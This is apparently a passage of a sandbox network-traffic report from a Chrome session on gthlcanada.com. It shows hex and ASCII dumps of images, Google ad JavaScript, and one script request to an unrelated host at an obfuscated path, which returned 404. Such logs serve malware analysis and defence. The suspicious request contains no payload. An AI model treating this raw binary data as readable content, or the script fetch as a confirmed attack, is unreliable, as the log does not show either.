                                                                                                                          2025-01-13 21:01:19 UTC6396INData Raw: 75 54 be b4 ca 92 e8 8f 0e 3a 19 09 2b 53 ae 10 48 e1 63 00 24 e7 e9 df 56 c0 95 57 a0 94 87 a9 3d 0e 8f d5 86 18 66 f1 bf aa 92 5b 85 39 33 a1 24 45 40 f8 75 6d 28 52 47 27 85 24 f3 f5 19 c6 a0 35 af 04 1d 37 ac d5 a6 d4 e4 dd f5 f4 a6 63 c5 f2 c3 08 65 09 42 8f 7c 12 82 71 9e 7f 3d 16 28 7d 44 55 62 9b 47 a9 7e cb 4c 74 55 e9 26 aa da 54 e9 5a 90 92 50 96 db 21 23 95 2d 4e 60 63 db b6 a3 f6 7f 5b e1 dd 35 86 2d f7 6d aa 94 09 ae 4b 7e 1a 83 81 4a 49 53 23 f7 8b 46 50 09 40 56 13 92 06 0e 73 8c 73 19 8c 49 bb c2 95 92 c9 17 e0 34 87 15 bf ec fb e9 05 cd 05 34 aa cd db 7b 3d 4d ca 54 a8 28 a8 34 db 2b 52 7b 28 a4 35 ca b9 ef ac e9 1f d9 d9 e1 c2 91 4f 87 4a 44 1b 92 44 38 52 7e 2d b6 1d ab 9f 2d 4e e4 65 4a 09 48 dc 7e 50 39 f4 18 d5 92 49 56 cd c5 4a e0
                                                                                                                          Data Ascii: uT:+SHc$VW=f[93$E@um(RG'$57ceB|q=(}DUbG~LtU&TZP!#-N`c[5-mK~JIS#FP@VssI44{=MT(4+R{(5OJDD8R~--NeJH~P9IVJ
                                                                                                                          2025-01-13 21:01:19 UTC6396INData Raw: b0 c7 4e 25 b2 00 1b 03 d3 60 44 cf 18 ff 00 56 48 23 ed 8d 36 6e a9 8a cd 80 2e fb 01 f7 24 0f b2 6b 71 df f2 5c ab 5c 57 a3 4c 53 08 0a 51 e4 a7 29 20 91 8e f8 fb 6b e4 9c fe 3c e7 5d 37 ac 74 ae 91 5c 6d 7f b5 fa 77 21 e4 29 0a 4a bc 93 12 6a 93 91 82 70 d2 82 bb 1c 71 ce ab 4f 57 fc 2a 51 29 a2 4d 42 c0 a9 bf 1e 63 48 2f 2a 8b 39 87 1b 74 a7 19 3e 5e f1 bb 3f 4e 7e fa 64 39 b0 ca 69 bf ef d4 58 fd 52 be 17 00 ab 2b 69 2e 9e 4e 10 35 b1 2e 60 80 9e c3 9d 62 ea 83 29 f2 31 f3 a7 f1 71 d8 fb 6b 42 9c 48 e4 1d 1f 6a 0a 5e 4f 70 ad d2 07 6f 5d 1a bc 2c ce e9 fd 3e b3 5d 5d ff 00 26 2b 0c c8 82 96 62 ae 4b 85 28 4b 85 60 95 70 09 24 01 c6 01 ef a0 6b 8a 2b 51 3a 3b 78 78 e9 65 12 f0 6a 89 53 b8 53 21 51 6a 57 32 28 ea 6d b7 7c bd cd 7c 32 dd 56 0e 32 0e 42
                                                                                                                          Data Ascii: N%`DVH#6n.$kq\\WLSQ) k<]7t\mw!)JjpqOW*Q)MBcH/*9t>^?N~d9iXR+i.N5.`b)1qkBHj^Opo],>]]&+bK(K`p$k+Q:;xxejSS!QjW2(m||2V2B
                                                                                                                          2025-01-13 21:01:19 UTC4616INData Raw: 3a f4 97 80 e5 65 4b e1 b4 8e 70 91 80 07 eb aa b9 e2 46 ab 68 de 15 18 56 df 45 ec cf 86 fd 97 bd 2f 54 68 d1 02 0b ec af f1 21 09 42 71 b7 3c 87 57 8e 7f 0f 04 9d 01 0f b2 18 ac 69 11 48 e0 48 a7 11 5f 13 89 b2 e3 b5 ee 7b 0a 14 00 aa 14 8a 77 5f 99 e6 de c0 68 ed ce c2 a8 01 bd 7f a5 6f ea 1d eb 1e 9c cb 94 fa 74 c8 0e 3e ea b3 2d b7 d9 53 e5 d6 07 04 04 a0 e4 13 d8 67 dc 9c 1c ea ba f5 76 ad 02 44 d6 a9 54 2a 5b 74 f4 6f 71 f3 0d 94 00 37 2b ba 95 8e c7 8f 7f a6 be a8 cb 36 ef 9b 4c 68 35 4e 7d 39 0e b8 24 7c 4c ad de a1 6e 72 94 9f a0 24 ea 1d 51 74 2d b7 cc 27 48 75 f3 95 3c a5 ef 52 8f b1 51 e4 6a e7 a5 fb 3b fc 3f 49 63 b8 37 f3 35 43 6e 28 0e 2d 03 99 d5 bd e6 c1 1c 8a f9 7d 7d 7b ab 17 e0 6a 9f 4f 72 d2 ae 55 25 32 93 e4 d4 88 7c fb fc 83 68 3f
                                                                                                                          Data Ascii: :eKpFhVE/Th!Bq<WiHH_{w_hot>-SgvDT*[toq7+6Lh5N}9$|Lnr$Qt-'Hu<RQj;?Ic75Cn(-}}{jOrU%2|h?
                                                                                                                          2025-01-13 21:01:19 UTC12792INData Raw: 39 db 8c f1 a0 fa b4 e3 11 9a 61 00 17 72 42 2f a6 c3 ef 0f b7 ee 1b c2 80 42 b0 6d 28 aa 75 0e b3 15 75 38 f9 4a 19 5e 1b 46 ef 7c 0e d8 fb e7 ed a1 f5 e9 62 5c 74 f5 7c 6d 39 b4 c7 79 7c b6 23 2f 2d 9f 7c 1f 4f b1 d5 ee e9 ff 00 85 bb 32 4b 0d 54 6e a5 38 a7 9c 3e 66 d6 dc f9 8e ef 55 13 9d 13 27 78 7b e9 b4 68 62 9b 02 9c a9 4b 74 04 85 ba 41 f2 d3 eb e9 ac d3 25 7d ea 25 68 bc 06 1f 85 71 c6 b5 41 ea 0c 49 5f b5 e4 a8 be d0 ca 42 94 bd c3 b0 c8 fa 7d f4 d9 4d a8 48 93 53 fd 9f 73 46 fd db 98 29 5a db 27 69 39 e7 dc 8d 74 f2 f7 f0 d6 ed 36 14 b3 40 a0 07 a3 6d 59 28 d8 09 e3 db df df 41 09 3e 1c 23 c6 0e 57 2a b6 f5 42 10 5b 7b 5b 71 2d 67 6e ee c0 24 f6 fb e8 a6 67 57 e2 6d 21 e4 c1 77 e5 36 a9 35 d1 6b c2 89 0d ca c5 32 53 6b 4b 6b db 22 30 ce 51 cf
                                                                                                                          Data Ascii: 9arB/Bm(uu8J^F|b\t|m9y|#/-|O2KTn8>fU'x{hbKtA%}%hqAI_B}MHSsF)Z'i9t6@mY(A>#W*B[{[q-gn$gWm!w65k2SkKk"0Q


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          100192.168.11.2049922142.250.31.1564431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC487OUTGET /pagead/managed/js/gpt/m202501070101/pubads_impl.js HTTP/1.1
                                                                                                                          Host: securepubads.g.doubleclick.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wB
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC745INHTTP/1.1 200 OK
                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                          Timing-Allow-Origin: *
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                          Server: cafe
                                                                                                                          Content-Length: 510147
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          Date: Mon, 13 Jan 2025 18:02:32 GMT
                                                                                                                          Expires: Tue, 13 Jan 2026 18:02:32 GMT
                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                          ETag: 273197895018558538
                                                                                                                          Content-Type: text/javascript; charset=ISO-8859-1
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Age: 10727
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2025-01-13 21:01:19 UTC510INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 2d 32 30 31 38 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2c 20 4e 65 74 66 6c 69 78 2c 20 49 6e 63 2e 2c 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 2e 20 61 6e 64 20
                                                                                                                          Data Ascii: (function(_){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ /* Copyright Google LLC SPDX-License-Identifier: Apache-2.0 */ /* Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 62 79 20 61 70 70 6c 69 63 61 62 6c 65 20 6c 61 77 20 6f 72 20 61 67 72 65 65 64 20 74 6f 20 69 6e 20 77 72 69 74 69 6e 67 2c 20 73 6f 66 74 77 61 72 65 20 0a 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 6f 6e 20 61 6e 20 22 41 53 20 49 53 22 20 42 41 53 49 53 2c 20 0a 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 49 45 53 20 4f 52 20 43 4f 4e 44 49 54 49 4f 4e 53 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 20 0a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73
                                                                                                                          Data Ascii: by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permis
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 6a 2c 4e 6a 2c 51 6a 2c 56 6a 2c 58 6a 2c 59 6a 2c 62 6b 2c 61 6b 2c 64 6b 2c 66 6b 2c 67 6b 2c 69 6b 2c 6f 6b 2c 79 6b 2c 42 6b 2c 43 6b 2c 44 6b 2c 45 6b 2c 46 6b 2c 47 6b 2c 48 6b 2c 49 6b 2c 4b 6b 2c 4e 6b 2c 4c 6b 2c 51 6b 2c 4d 6b 2c 52 6b 2c 55 6b 2c 56 6b 2c 59 6b 2c 24 6b 2c 61 6c 2c 64 6c 2c 67 6c 2c 68 6c 2c 69 6c 2c 6a 6c 2c 6f 6c 2c 76 6c 2c 71 6c 2c 77 6c 2c 48 6c 2c 52 6c 2c 50 6c 2c 51 6c 2c 57 6c 2c 24 6c 2c 65 6d 2c 68 6d 2c 6a 6d 2c 6b 6d 2c 6c 6d 2c 6e 6d 2c 72 6d 2c 79 6d 2c 74 6d 2c 45 6d 2c 6f 6d 2c 47 6d 2c 48 6d 2c 4b 6d 2c 4d 6d 2c 52 6d 2c 55 6d 2c 56 6d 2c 52 2c 59 6d 2c 5a 6d 2c 24 6d 2c 6d 6e 2c 53 2c 6f 6e 2c 70 6e 2c 71 6e 2c 73 6e 2c 75 6e 2c 76 6e 2c 43 6e 2c 44 6e 2c 46 6e 2c 47 6e 2c 4c 6e 2c 53 6e 2c 55 6e 2c 57 6e 2c
                                                                                                                          Data Ascii: j,Nj,Qj,Vj,Xj,Yj,bk,ak,dk,fk,gk,ik,ok,yk,Bk,Ck,Dk,Ek,Fk,Gk,Hk,Ik,Kk,Nk,Lk,Qk,Mk,Rk,Uk,Vk,Yk,$k,al,dl,gl,hl,il,jl,ol,vl,ql,wl,Hl,Rl,Pl,Ql,Wl,$l,em,hm,jm,km,lm,nm,rm,ym,tm,Em,om,Gm,Hm,Km,Mm,Rm,Um,Vm,R,Ym,Zm,$m,mn,S,on,pn,qn,sn,un,vn,Cn,Dn,Fn,Gn,Ln,Sn,Un,Wn,
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 7d 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 74 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22 22 7d 3b 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 64 61 3f 65 61 3f 65 61 2e 62 72 61 6e 64 73 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 62 72 61 6e 64 29 26 26 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 29 3a 21 31 3a 21 31 7d 3b 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 61 28 29 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 3b 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 61 3f 21 21 65 61 26 26 65 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67
                                                                                                                          Data Ascii: };ca=function(){var a=_.t.navigator;return a&&(a=a.userAgent)?a:""};fa=function(a){return da?ea?ea.brands.some(function(b){return(b=b.brand)&&b.indexOf(a)!=-1}):!1:!1};ha=function(a){return ca().indexOf(a)!=-1};la=function(){return da?!!ea&&ea.brands.leng
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 5f 2e 46 61 29 72 65 74 75 72 6e 20 61 2e 67 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7d 3b 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 62 3d 3d 3d 76 6f 69 64 20 30 3f 22 75 6e 65 78 70 65 63 74 65 64 20 76 61 6c 75 65 20 22 2b 61 2b 22 21 22 3a 62 29 3b 7d 3b 4b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 73 61 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 4a 61 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 28 61 29 3a 61 29 7d 3b 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 4a 61 29 72 65 74 75 72 6e 20 61 2e 67 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7d 3b 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 3d
                                                                                                                          Data Ascii: _.Fa)return a.g;throw Error("");};Ia=function(a,b){throw Error(b===void 0?"unexpected value "+a+"!":b);};Ka=function(a){var b=sa();return new Ja(b?b.createScript(a):a)};La=function(a){if(a instanceof Ja)return a.g;throw Error("");};Ma=function(a){var b,c=
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 2e 63 61 6c 6c 28 64 2c 66 29 7c 7c 28 64 5b 66 5d 3d 21 30 2c 61 5b 62 2b 2b 5d 3d 65 29 7d 61 2e 6c 65 6e 67 74 68 3d 62 7d 3b 61 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 6f 72 74 28 62 7c 7c 5f 2e 24 61 29 7d 3b 63 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 62 62 2c 63 3d 41 72 72 61 79 28 61 2e 6c 65 6e 67 74 68 29 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 63 5b 64 5d 3d 7b 69 6e 64 65 78 3a 64 2c 76 61 6c 75 65 3a 61 5b 64 5d 7d 3b 76 61 72 20 65 3d 62 7c 7c 5f 2e 24 61 3b 61 62 28 63 2c 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 65 28 66 2e 76 61 6c 75 65 2c 67 2e 76 61 6c 75 65 29 7c 7c 66 2e 69 6e 64 65 78 2d 67 2e 69 6e 64 65 78 7d 29 3b 66 6f 72 28 62 3d 30 3b 62
                                                                                                                          Data Ascii: .call(d,f)||(d[f]=!0,a[b++]=e)}a.length=b};ab=function(a,b){a.sort(b||_.$a)};cb=function(a){for(var b=bb,c=Array(a.length),d=0;d<a.length;d++)c[d]={index:d,value:a[d]};var e=b||_.$a;ab(c,function(f,g){return e(f.value,g.value)||f.index-g.index});for(b=0;b
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 65 6e 74 28 63 29 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 29 7d 29 2e 6a 6f 69 6e 28 22 26 22 29 2b 22 26 61 63 76 77 3d 5b 56 49 45 57 41 42 49 4c 49 54 59 5d 22 7d 3b 6f 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 21 31 3b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 62 3b 69 66 28 6c 62 29 7b 69 66 28 62 26 26 28 6d 62 3f 21 61 2e 69 73 57 65 6c 6c 46 6f 72 6d 65 64 28 29 3a 2f 28 3f 3a 5b 5e 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 7c 5e 29 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 7c 5b 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 28 3f 21 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 29 2f 2e 74 65 73 74 28 61 29 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 46 6f 75 6e 64 20 61 6e 20 75 6e 70 61
                                                                                                                          Data Ascii: ent(c)+"="+encodeURIComponent(d)}).join("&")+"&acvw=[VIEWABILITY]"};ob=function(a){var b=!1;b=b===void 0?!1:b;if(lb){if(b&&(mb?!a.isWellFormed():/(?:[^\uD800-\uDBFF]|^)[\uDC00-\uDFFF]|[\uD800-\uDBFF](?![\uDC00-\uDFFF])/.test(a)))throw Error("Found an unpa
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7a 62 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 5f 2e 74 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 28 62 29 7d 2c 30 29 7d 7d 3b 42 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 7a 62 29 74 72 79 7b 7a 62 28 61 29 7d 63 61 74 63 68 28 62 29 7b 74 68 72 6f 77 20 62 2e 63 61 75 73 65 3d 61 2c 62 3b 7d 7d 3b 44 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 72 72 6f 72 28 29 3b 43 62 28 61 2c 22 69 6e 63 69 64 65 6e 74 22 29 3b 7a 62 3f 42 62 28 61 29 3a 70 62 28 61 29 7d 3b 45 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 45 72 72 6f 72 28 61 29 3b 43 62 28 61 2c 22 77 61 72 6e 69 6e 67 22 29 3b 42 62 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 47 62 3d 66 75
                                                                                                                          Data Ascii: b)throw Error("");zb=function(b){_.t.setTimeout(function(){a(b)},0)}};Bb=function(a){if(zb)try{zb(a)}catch(b){throw b.cause=a,b;}};Db=function(){var a=Error();Cb(a,"incident");zb?Bb(a):pb(a)};Eb=function(a){a=Error(a);Cb(a,"warning");Bb(a);return a};Gb=fu
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 2e 6c 65 6e 67 74 68 3f 21 31 3a 28 30 2c 5f 2e 59 62 29 28 61 29 26 31 3f 21 30 3a 21 31 7d 3b 5f 2e 24 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 26 32 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 3b 61 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 74 79 70 65 6f 66 20 62 21 3d 3d 22 6e 75 6d 62 65 72 22 7c 7c 62 3c 30 7c 7c 62 3e 3d 61 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 3b 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 74 79 70 65 6f 66 20 62 21 3d 3d 22 6e 75 6d 62 65 72 22 7c 7c 62 3c 30 7c 7c 62 3e 61 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 3b 65 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62
                                                                                                                          Data Ascii: ay.isArray(a)||a.length?!1:(0,_.Yb)(a)&1?!0:!1};_.$b=function(a){if(a&2)throw Error();};ac=function(a,b){if(typeof b!=="number"||b<0||b>=a.length)throw Error();};bc=function(a,b){if(typeof b!=="number"||b<0||b>a.length)throw Error();};ec=function(a){var b
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 72 28 53 74 72 69 6e 67 28 62 29 29 3b 7d 65 6c 73 65 20 69 66 28 76 63 28 62 29 26 26 21 5f 2e 78 28 4e 75 6d 62 65 72 2c 22 69 73 53 61 66 65 49 6e 74 65 67 65 72 22 29 2e 63 61 6c 6c 28 4e 75 6d 62 65 72 2c 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 72 65 74 75 72 6e 20 77 63 3f 42 69 67 49 6e 74 28 61 29 3a 61 3d 78 63 28 61 29 3f 61 3f 22 31 22 3a 22 30 22 3a 74 63 28 61 29 3f 61 2e 74 72 69 6d 28 29 7c 7c 22 30 22 3a 53 74 72 69 6e 67 28 61 29 7d 3b 7a 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3e 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 6c 65 6e 67 74 68 3c 62 2e 6c 65 6e 67 74 68 7c 7c 61 3d 3d 3d 62 29 72 65 74 75 72 6e 21 30 3b 66 6f 72 28 76 61
                                                                                                                          Data Ascii: r(String(b));}else if(vc(b)&&!_.x(Number,"isSafeInteger").call(Number,b))throw Error(String(b));return wc?BigInt(a):a=xc(a)?a?"1":"0":tc(a)?a.trim()||"0":String(a)};zc=function(a,b){if(a.length>b.length)return!1;if(a.length<b.length||a===b)return!0;for(va


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          101192.168.11.2049921185.76.79.504431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC575OUTGET /SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY= HTTP/1.1
                                                                                                                          Host: virtual.urban-orthodontics.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC165INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2025-01-13 21:01:21 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                          Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                          2025-01-13 21:01:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          102192.168.11.204992454.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC680OUTGET /app/uploads/gthl/2024/09/18145918/Game-Day-Meals-for-the-Season-1600x900-2-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 58245
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Wed, 18 Sep 2024 16:18:16 GMT
                                                                                                                          ETag: "e1e5e3ba30b15eff39c28d582ff542f0"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 6f18ca2e5109f8aa7cd1212932dc4e9a.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: KIn-INJ0n_U-CxiI1LAexKI4xq85aTUNMh792GckHcsVBh30eEPErw==
